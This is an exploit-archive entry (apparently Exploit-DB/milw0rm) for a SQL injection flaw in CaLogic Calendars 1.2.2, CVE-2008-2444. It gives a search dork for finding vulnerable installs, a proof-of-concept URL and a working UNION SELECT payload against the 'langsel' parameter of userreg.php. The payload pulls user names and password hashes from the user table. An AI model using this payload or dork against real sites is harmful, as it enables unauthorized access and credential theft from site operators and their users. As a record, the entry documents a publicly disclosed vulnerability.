CaLogic Calendars 1.2.2 - 'langsel' SQL Injection
Author: His0k4
type: webapps
platform: php
port:
date_added: 2008-05-12
date_updated: 2016-11-29
verified: 1
codes: OSVDB-45161;CVE-2008-2444
tags:
aliases:
screenshot_url:
application_url:
/---------------------------------------------------------------\
\ /
/ CaLogic Calendars V1.2.2 Remote SQL injection \
\ /
\---------------------------------------------------------------/
[*] Author : His0k4 [ALGERIAN HaCkEr]
[*] Dork : "CaLogic Calendars V1.2.2"
[*] POC : http://localhost/[SCRIPT_PATH]/userreg.php?langsel={SQL}
[*] Example : http://localhost/[SCRIPT_PATH]/userreg.php?langsel=1 and 1=0 UNION SELECT concat(uname,0x3a,pw) FROM clc_user_reg where uid=CHAR(49)--
[*] Note : You can see the results (user name & password) in "SQL String" line for example {SQL String: select * from clc_lang_admin:21232f297a57a5a743894a0e4a801fc3 where keyid='urth'}
----------------------------------------------------------------------------
[*] Greetings : Str0ke, all friends & muslims HaCkeRs...
# milw0rm.com [2008-05-13]